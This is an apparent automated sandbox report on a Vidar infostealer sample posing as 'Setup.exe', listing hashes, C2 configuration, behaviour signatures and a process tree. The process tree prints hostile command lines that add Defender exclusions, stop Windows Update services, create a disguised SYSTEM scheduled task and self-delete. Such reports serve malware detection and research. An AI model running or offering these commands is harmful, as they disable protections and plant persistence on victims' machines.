Analysis
-
max time kernel
96s -
max time network
166s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
-
submitted
06-04-2023 14:02
General
-
Target
Setup.exe
-
Size
1023.0MB
-
MD5
20435727abd593f6db2379c748289799
-
SHA1
12db6bce4173a977c0ad4de36a16f152dbcf5e49
-
SHA256
0f28b51ca82edd77e6d7f3626c8b66e6f04f6dfe48ff594f77ec6746a3c91968
-
SHA512
df5bc6ec08ac446b4add78cf9d657c2d7339d1cc69ca34f5c0b1881da05f6c8001791367299bdb1429f79aba626bdc110dfe50de6f1348155de5cc28f7752c78
-
SSDEEP
196608:4+hMmu0Vro/dFqg4cF3VjgY7lEGpDltGgC891SWAo0G:41m3OMEljl7lPftGgPuDr
Malware Config
Extracted
vidar
3.3
49bd1304650cc9c7f3f131428d9e16c2
https://steamcommunity.com/profiles/76561199492257783
https://t.me/justsometg
-
profile_id_v2
49bd1304650cc9c7f3f131428d9e16c2
-
user_agent
Mozilla/5.0 (X11; Linux 3.5.4-1-ARCH i686; es) KHTML/4.9.1 (like Gecko) Konqueror/4.9
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 6 IoCs
-
Loads dropped DLL 2 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 1 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 1 IoCs
-
Modifies data under HKEY_USERS 41 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 63 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQA1AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Setup.exeC:\Users\Admin\AppData\Local\Temp\Setup.exe3⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\57339499170671189215.exe"C:\ProgramData\57339499170671189215.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\ProgramData\57339499170671189215.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 06⤵
-
C:\ProgramData\42695661870735164723.exe"C:\ProgramData\42695661870735164723.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQA1AA==5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\42695661870735164723.exeC:\ProgramData\42695661870735164723.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQA1AA==7⤵
-
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exeC:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe7⤵
-
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exeC:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe7⤵
-
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exeC:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe7⤵
-
C:\ProgramData\14959293718659141969.exe"C:\ProgramData\14959293718659141969.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Setup.exe" & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rxejhfcm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rxejhfcm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 01⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 01⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 01⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 01⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
9.9MB
MD56fa2a8de3fc30b9c80d12c2ac4ad2e3f
SHA132fd7a00979b4ec01c031fdfbf12677529e6c4fa
SHA256a2c59381ca2fdba45f345eec78681fc417271e2f3fb65ff9ec06998d90abc9fd
SHA5129c51ac0abcab4b8e40b476dbb8e7aaff7a6057caf07756a1a846193bf9d4924fbe0f3f0847237029ecb6f840f658eb41fe43bb89dc7c74be6727c3ee12fe953e
-
C:\ProgramData\14959293718659141969.exeFilesize
9.9MB
MD56fa2a8de3fc30b9c80d12c2ac4ad2e3f
SHA132fd7a00979b4ec01c031fdfbf12677529e6c4fa
SHA256a2c59381ca2fdba45f345eec78681fc417271e2f3fb65ff9ec06998d90abc9fd
SHA5129c51ac0abcab4b8e40b476dbb8e7aaff7a6057caf07756a1a846193bf9d4924fbe0f3f0847237029ecb6f840f658eb41fe43bb89dc7c74be6727c3ee12fe953e
-
C:\ProgramData\14959293718659141969.exeFilesize
9.9MB
MD56fa2a8de3fc30b9c80d12c2ac4ad2e3f
SHA132fd7a00979b4ec01c031fdfbf12677529e6c4fa
SHA256a2c59381ca2fdba45f345eec78681fc417271e2f3fb65ff9ec06998d90abc9fd
SHA5129c51ac0abcab4b8e40b476dbb8e7aaff7a6057caf07756a1a846193bf9d4924fbe0f3f0847237029ecb6f840f658eb41fe43bb89dc7c74be6727c3ee12fe953e
-
C:\ProgramData\14959293718659141969.exeFilesize
9.9MB
MD56fa2a8de3fc30b9c80d12c2ac4ad2e3f
SHA132fd7a00979b4ec01c031fdfbf12677529e6c4fa
SHA256a2c59381ca2fdba45f345eec78681fc417271e2f3fb65ff9ec06998d90abc9fd
SHA5129c51ac0abcab4b8e40b476dbb8e7aaff7a6057caf07756a1a846193bf9d4924fbe0f3f0847237029ecb6f840f658eb41fe43bb89dc7c74be6727c3ee12fe953e
-
C:\ProgramData\42695661870735164723.exeFilesize
5.9MB
MD5aa57f0d7a099773175006624cc891b29
SHA144598d94dac6e9c72ffe65f9e17cf77c2c73e6fe
SHA2566227df9ce53429b024cb2fa118a7a735ec1c048117cb1a46247e92f1b839814f
SHA512e0fff8e7d8de1dc5b3d84bdea90828f9739499183aabb11eb5b7600af132f8fa0569bc49d4ca21ec5df925482ec2149d0134a88a4e8a632cb0326444a6bc31b0
-
C:\ProgramData\42695661870735164723.exeFilesize
5.9MB
MD5aa57f0d7a099773175006624cc891b29
SHA144598d94dac6e9c72ffe65f9e17cf77c2c73e6fe
SHA2566227df9ce53429b024cb2fa118a7a735ec1c048117cb1a46247e92f1b839814f
SHA512e0fff8e7d8de1dc5b3d84bdea90828f9739499183aabb11eb5b7600af132f8fa0569bc49d4ca21ec5df925482ec2149d0134a88a4e8a632cb0326444a6bc31b0
-
C:\ProgramData\42695661870735164723.exeFilesize
5.9MB
MD5aa57f0d7a099773175006624cc891b29
SHA144598d94dac6e9c72ffe65f9e17cf77c2c73e6fe
SHA2566227df9ce53429b024cb2fa118a7a735ec1c048117cb1a46247e92f1b839814f
SHA512e0fff8e7d8de1dc5b3d84bdea90828f9739499183aabb11eb5b7600af132f8fa0569bc49d4ca21ec5df925482ec2149d0134a88a4e8a632cb0326444a6bc31b0
-
C:\ProgramData\42695661870735164723.exeFilesize
5.9MB
MD5aa57f0d7a099773175006624cc891b29
SHA144598d94dac6e9c72ffe65f9e17cf77c2c73e6fe
SHA2566227df9ce53429b024cb2fa118a7a735ec1c048117cb1a46247e92f1b839814f
SHA512e0fff8e7d8de1dc5b3d84bdea90828f9739499183aabb11eb5b7600af132f8fa0569bc49d4ca21ec5df925482ec2149d0134a88a4e8a632cb0326444a6bc31b0
-
C:\ProgramData\57339499170671189215.exeFilesize
13.9MB
MD50abca5a76379dc774f4c133a177cde59
SHA15c7c48d7f3fea2c5e5f950cf83492cda82fda838
SHA25659a16f9faf29768ed027a33dced3dc1cd61c4be814b59070b3ce79e34bb6b963
SHA512dd3176ce1e26992be85022a0a9825520496d20a3a7d09b44a4ddedc05511668411f16733efcb82f80f105fef94c2bfa59f9fe908ef281de65f585a1448b668c7
-
C:\ProgramData\57339499170671189215.exeFilesize
13.9MB
MD50abca5a76379dc774f4c133a177cde59
SHA15c7c48d7f3fea2c5e5f950cf83492cda82fda838
SHA25659a16f9faf29768ed027a33dced3dc1cd61c4be814b59070b3ce79e34bb6b963
SHA512dd3176ce1e26992be85022a0a9825520496d20a3a7d09b44a4ddedc05511668411f16733efcb82f80f105fef94c2bfa59f9fe908ef281de65f585a1448b668c7
-
C:\ProgramData\57339499170671189215.exeFilesize
13.9MB
MD50abca5a76379dc774f4c133a177cde59
SHA15c7c48d7f3fea2c5e5f950cf83492cda82fda838
SHA25659a16f9faf29768ed027a33dced3dc1cd61c4be814b59070b3ce79e34bb6b963
SHA512dd3176ce1e26992be85022a0a9825520496d20a3a7d09b44a4ddedc05511668411f16733efcb82f80f105fef94c2bfa59f9fe908ef281de65f585a1448b668c7
-
C:\ProgramData\mozglue.dllFilesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
C:\ProgramData\nss3.dllFilesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5622bf737a997b9a257f15dc3b9ee9da5
SHA16beba023f9c081393b64de079969e948a47be8be
SHA256bcefb9a5dbc47579f8b52cc37fd7591a0e20f00f0a7867df0232088db90273d7
SHA512c1833c09ef0b3e643b8657874e8a99d7d154ac255c326d85fccba53aa57679e7dad93e61b3b8419937cb7ad936eab727c5edd6c4be6b988982c1d61505305e77
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
16KB
MD5d1767a535be7637a9bd4ceea151355d0
SHA13c42c961eb8fdebd2c05da0308abc00e842d52f8
SHA256963d177c9cf0882a2cd777527b4593d27f34f5bc0532e3994930eae52cffc716
SHA5127f444c7b1573327e4787751731bf75e296d2bdd8cfbbefb1e9cce73ef02c662bfec29655e8afa498ca09cddd9784612f440cc8c018d76bc385fa72962e94b4f2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD59b80cd7a712469a4c45fec564313d9eb
SHA16125c01bc10d204ca36ad1110afe714678655f2d
SHA2565a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD56c182bad99222315e6d128fb4b0ff688
SHA10b3f097952d42d83bdbc8617901791042aa34f08
SHA256c9414428b5f83f8456431ec79f935d1cc63ed4bda226d52a1c807332b0f80969
SHA51217a07c625d1ceadff1a000355f4e0eb9ed3a780e51612a3623c64c36f125667af1d874cf3e9311be52c16a799041fe884943b1ec08a356cd7f22114775957d7f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD56c182bad99222315e6d128fb4b0ff688
SHA10b3f097952d42d83bdbc8617901791042aa34f08
SHA256c9414428b5f83f8456431ec79f935d1cc63ed4bda226d52a1c807332b0f80969
SHA51217a07c625d1ceadff1a000355f4e0eb9ed3a780e51612a3623c64c36f125667af1d874cf3e9311be52c16a799041fe884943b1ec08a356cd7f22114775957d7f
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uqo21kx0.um1.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exeFilesize
585.9MB
MD551a65ed24dd70fe83240ac5b57cc4730
SHA1e01bf638a0dc92e447ad5860521e05f139b92ab2
SHA25670c1744049eb945b92f121cb6a0fcfcc2799519cceb8b6e4a53c140abb8104d0
SHA51231a61fd52ba2d4afa2a5a2a4a805a97075b22c73cd00bee14b6cf85ba2398cc98fb4a58d8c1b469f2a4d38527e5909b72d9cbf6aca1adbb69a56f7bfb34acbe4
-
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exeFilesize
583.6MB
MD54221f9793f0c7f20b954f4a267f7c885
SHA152c8af2f4e72a283756dea9c4329e7d55ac7f06c
SHA256e3906a6dfeed8c4780e5e2ab96fb7108434c2a460d6a1c1360bf67485e11d5b6
SHA512aa1ed7015004fec7674c7e5618364a3c1ac228cea0ebc755dc16400d5ca4fa50a6e28a67a066b681b6b0a76ac464d61da5a477850a866dbf1f9b445c97797279
-
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exeFilesize
9.1MB
MD529b3bb45705575483869d5f2539dbfb4
SHA1edd2a41ac338324981625017383bb30244788446
SHA2566cc3745f43e721eafb0978df60ae688bb853dccf0774405f72f08cf3b6cde3d9
SHA512218cee52fdc0324b40b94a52fb1c2be9ce1dcdc2d1779272481440b75a40a4aeb0739097dff968fdc23d8bb6a871353effe5fe0f769e3aea4f8daee797d08e6d
-
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exeFilesize
9.6MB
MD5f009fa28e46abe4a195f51088831c001
SHA1accd9340cdf7a8e423adf526906223c6c8629918
SHA2565f37bec0aeaeaaaa07d34381aae5cf57e3dd1becdf1ab520919bea2fe906414a
SHA51227f8afe54dc64b4072509e704dc73796c2fbea0b805104484115f16f554e7e7de533d2998f272ad5c2abf275121be0fffc93118866130e1fa5add7590b843093
-
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exeFilesize
9.0MB
MD592c44a744cda495ef3cfedfa142b58fa
SHA1012faadd311233a69c98045c91b04e8113cbd56a
SHA25650b5a904733e377a8139b16a73f3528490df5e7387a322cf0e1f99a37c3d40d8
SHA5120e827c8ac156dabfe88b3ccfc026d5623b632551348bb2b4003ff3d8e83af8bb1370187ce0cba2971d7ac0b1b7e24cf3ce390115e86b15d296f20a2dca9b9648
-
C:\Windows\System32\drivers\etc\hostsFilesize
3KB
MD500930b40cba79465b7a38ed0449d1449
SHA14b25a89ee28b20ba162f23772ddaf017669092a5
SHA256eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
23KB
MD5293d759573c5f8e69408372040d6c94c
SHA107106ccb998b4a31b641f63a8bbc562a63b6725d
SHA256f807ea59ba55d0b621357c5834f93a12fe424c3fb63021f9d381540c321808f4
SHA512a7b02aa83388be265021fc2de11dbce838bd65d63c63d2ea1209eba1d6fde0a74d470324d096d3f2b37179db4491e520a10bfdadc75f0ab1fa97801d2686710f
-
memory/480-444-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/480-448-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/676-380-0x00007FF7084D0000-0x00007FF708EB5000-memory.dmpFilesize
9.9MB
-
memory/676-312-0x00007FF7084D0000-0x00007FF708EB5000-memory.dmpFilesize
9.9MB
-
memory/1108-315-0x0000022E55590000-0x0000022E555A0000-memory.dmpFilesize
64KB
-
memory/1108-338-0x0000022E6F750000-0x0000022E6F758000-memory.dmpFilesize
32KB
-
memory/1108-340-0x0000022E55590000-0x0000022E555A0000-memory.dmpFilesize
64KB
-
memory/1108-337-0x0000022E6F3D0000-0x0000022E6F3DA000-memory.dmpFilesize
40KB
-
memory/1108-339-0x0000022E6F760000-0x0000022E6F76A000-memory.dmpFilesize
40KB
-
memory/1108-336-0x0000022E6F5F0000-0x0000022E6F60C000-memory.dmpFilesize
112KB
-
memory/1108-341-0x00007FF45F7D0000-0x00007FF45F7E0000-memory.dmpFilesize
64KB
-
memory/1108-316-0x0000022E6F230000-0x0000022E6F252000-memory.dmpFilesize
136KB
-
memory/1108-317-0x0000022E55590000-0x0000022E555A0000-memory.dmpFilesize
64KB
-
memory/1348-272-0x0000000000500000-0x0000000001350000-memory.dmpFilesize
14.3MB
-
memory/1504-405-0x000001A733FA0000-0x000001A733FB0000-memory.dmpFilesize
64KB
-
memory/1504-407-0x000001A733FA0000-0x000001A733FB0000-memory.dmpFilesize
64KB
-
memory/1504-406-0x000001A733FA0000-0x000001A733FB0000-memory.dmpFilesize
64KB
-
memory/1504-459-0x000001A74EA90000-0x000001A74EAAA000-memory.dmpFilesize
104KB
-
memory/1504-427-0x000001A734210000-0x000001A73422C000-memory.dmpFilesize
112KB
-
memory/1504-431-0x000001A7340E0000-0x000001A7340EA000-memory.dmpFilesize
40KB
-
memory/1504-460-0x000001A734270000-0x000001A734276000-memory.dmpFilesize
24KB
-
memory/2124-437-0x00007FF7024D0000-0x00007FF702EB5000-memory.dmpFilesize
9.9MB
-
memory/2124-404-0x00007FF7024D0000-0x00007FF702EB5000-memory.dmpFilesize
9.9MB
-
memory/2124-393-0x00007FF7024D0000-0x00007FF702EB5000-memory.dmpFilesize
9.9MB
-
memory/2228-285-0x0000000004F70000-0x0000000004F80000-memory.dmpFilesize
64KB
-
memory/2228-284-0x0000000000470000-0x00000000006B8000-memory.dmpFilesize
2.3MB
-
memory/2228-311-0x0000000004F70000-0x0000000004F80000-memory.dmpFilesize
64KB
-
memory/2260-314-0x0000000004A50000-0x0000000004A60000-memory.dmpFilesize
64KB
-
memory/2260-298-0x0000000004A50000-0x0000000004A60000-memory.dmpFilesize
64KB
-
memory/2260-301-0x0000000004A50000-0x0000000004A60000-memory.dmpFilesize
64KB
-
memory/2260-313-0x0000000004A50000-0x0000000004A60000-memory.dmpFilesize
64KB
-
memory/2488-394-0x0000000005860000-0x0000000005870000-memory.dmpFilesize
64KB
-
memory/2768-449-0x0000019240510000-0x0000019240520000-memory.dmpFilesize
64KB
-
memory/2768-447-0x0000019240510000-0x0000019240520000-memory.dmpFilesize
64KB
-
memory/2824-143-0x0000000005E10000-0x0000000005E76000-memory.dmpFilesize
408KB
-
memory/2824-149-0x0000000002B20000-0x0000000002B30000-memory.dmpFilesize
64KB
-
memory/2824-164-0x0000000002B20000-0x0000000002B30000-memory.dmpFilesize
64KB
-
memory/2824-163-0x0000000002B20000-0x0000000002B30000-memory.dmpFilesize
64KB
-
memory/2824-162-0x0000000002B20000-0x0000000002B30000-memory.dmpFilesize
64KB
-
memory/2824-154-0x0000000002B20000-0x0000000002B30000-memory.dmpFilesize
64KB
-
memory/2824-155-0x0000000006430000-0x000000000644E000-memory.dmpFilesize
120KB
-
memory/2824-158-0x0000000006940000-0x000000000695A000-memory.dmpFilesize
104KB
-
memory/2824-140-0x0000000004EA0000-0x0000000004ED6000-memory.dmpFilesize
216KB
-
memory/2824-141-0x0000000005510000-0x0000000005B38000-memory.dmpFilesize
6.2MB
-
memory/2824-142-0x0000000005CF0000-0x0000000005D56000-memory.dmpFilesize
408KB
-
memory/2824-156-0x0000000002B20000-0x0000000002B30000-memory.dmpFilesize
64KB
-
memory/2824-157-0x0000000007A60000-0x00000000080DA000-memory.dmpFilesize
6.5MB
-
memory/3112-373-0x000002057D2F0000-0x000002057D300000-memory.dmpFilesize
64KB
-
memory/3112-375-0x00007FF475FE0000-0x00007FF475FF0000-memory.dmpFilesize
64KB
-
memory/3112-374-0x000002057D2F0000-0x000002057D300000-memory.dmpFilesize
64KB
-
memory/3112-372-0x000002057D2F0000-0x000002057D300000-memory.dmpFilesize
64KB
-
